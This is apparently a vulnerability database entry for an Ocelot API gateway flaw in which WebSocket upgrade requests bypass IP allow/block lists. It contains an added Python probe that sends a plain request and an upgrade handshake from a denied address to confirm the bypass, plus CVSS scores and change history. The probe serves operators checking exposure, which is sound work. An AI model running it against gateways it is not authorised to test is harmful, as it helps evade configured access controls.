Ocelot through 24.1.0, fixed in commit f156fd4, contains a security control bypass vulnerability that allows denied clients to circumvent IP-based access restrictions by sending WebSocket upgrade requests. The WebSocket upgrade pipeline branch configured via MapWhen in OcelotPipelineExtensions.cs omits SecurityMiddleware, causing requests from blocked IP addresses to be proxied to downstream services without enforcement of the configured allow/block list.
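The practical check a gateway operator wants for this advisory is whether a route whose IP allow/block list rejects an ordinary HTTP request still lets a WebSocket upgrade through from the same denied address. The probe below is an added example written for this page, not code from the Ocelot project: it sends a plain GET and an RFC 6455 upgrade handshake over the same route and compares the answers. The host, port and route path are placeholders, the caller must run it from an address the route's list denies, and it assumes (not stated on the page) that the gateway answers a filtered request with a 4xx status; a completed handshake is recognised by a 101 status whose Sec-WebSocket-Accept header matches the key that was sent, which only a downstream WebSocket server would have produced.

```python
"""Probe a gateway route for the WebSocket-upgrade IP-filter bypass.

Added example for the advisory above; not Ocelot's own code.  The target
host/port/path are placeholders and the classification assumes a filtered
request is answered with a 4xx status (an assumption, not from the page).
"""
import base64
import hashlib
import os
import socket
import sys

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed by RFC 6455


def make_ws_key() -> str:
    """Random 16-byte nonce, base64-encoded, as the client handshake requires."""
    return base64.b64encode(os.urandom(16)).decode("ascii")


def expected_accept(key: str) -> str:
    """Sec-WebSocket-Accept value a real WebSocket server must return for `key`."""
    digest = hashlib.sha1((key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def build_plain_request(host: str, path: str) -> bytes:
    """Ordinary HTTP/1.1 GET that goes through the normal gateway pipeline."""
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode("ascii")


def build_upgrade_request(host: str, path: str, key: str) -> bytes:
    """Same route, but with the headers that select the WebSocket pipeline branch."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {key}\r\n"
        "Sec-WebSocket-Version: 13\r\n"
        "\r\n"
    ).encode("ascii")


def parse_response(raw: bytes):
    """Return (status_code, {lowercased header: value}) from a raw HTTP/1.1 response head."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def classify(plain_status: int, ws_status: int, ws_headers: dict, key: str) -> str:
    """'bypass' if the plain request was filtered but the upgrade was proxied through."""
    plain_blocked = 400 <= plain_status < 500          # assumption: filter answers 4xx
    handshake_ok = ws_status == 101 and ws_headers.get("sec-websocket-accept") == expected_accept(key)
    if plain_blocked and handshake_ok:
        return "bypass"       # list enforced on HTTP, skipped on the WebSocket branch
    if plain_blocked:
        return "enforced"     # both request kinds rejected
    return "inconclusive"     # plain request not blocked: wrong source address or no list on this route


def probe(host: str, port: int, path: str, timeout: float = 5.0) -> str:
    """Send both requests to a live gateway and classify the result."""
    def exchange(payload: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(payload)
            buf = b""
            while b"\r\n\r\n" not in buf:      # stop once the response head is complete
                chunk = sock.recv(4096)
                if not chunk:
                    break
                buf += chunk
            return buf

    plain_status, _ = parse_response(exchange(build_plain_request(host, path)))
    key = make_ws_key()
    ws_status, ws_headers = parse_response(exchange(build_upgrade_request(host, path, key)))
    return classify(plain_status, ws_status, ws_headers, key)


if __name__ == "__main__":
    # Placeholders: run from a denied address against a route that has an IP list configured.
    target_host, target_port, route = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    print(probe(target_host, target_port, route))
```

Run it as `python probe.py gateway.example 8080 /ws-route` from a client address the route denies. An "inconclusive" result means the plain request was not filtered at all, so the probe was not run from a denied address or the route has no list; only a "bypass" result shows the behaviour the advisory describes.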
History

Wed, 01 Jul 2026 15:30:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 01 Jul 2026 10:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Threemammals
                                      Threemammals ocelot
Vendors & Products                    Threemammals
                                      Threemammals ocelot

Tue, 30 Jun 2026 16:45:00 +0000

Type          Values Removed   Values Added
Description                    Ocelot through 24.1.0, fixed in commit f156fd4, contains a security control bypass vulnerability that allows denied clients to circumvent IP-based access restrictions by sending WebSocket upgrade requests. The WebSocket upgrade pipeline branch configured via MapWhen in OcelotPipelineExtensions.cs omits SecurityMiddleware, causing requests from blocked IP addresses to be proxied to downstream services without enforcement of the configured allow/block list.
Title                          Ocelot - IP Allow/Block List Bypass for WebSocket Upgrade Requests
Weaknesses                     CWE-288
References
Metrics                        cvssV3_1 {'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}
                               cvssV4_0 {'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published: 2026-06-30T15:54:59.466Z

Updated: 2026-07-01T15:03:37.053Z

Reserved: 2026-06-29T16:03:38.521Z

Link: CVE-2026-58172

Vulnrichment

Updated: 2026-07-01T15:03:33.448Z

NVD

No data.

Redhat

No data.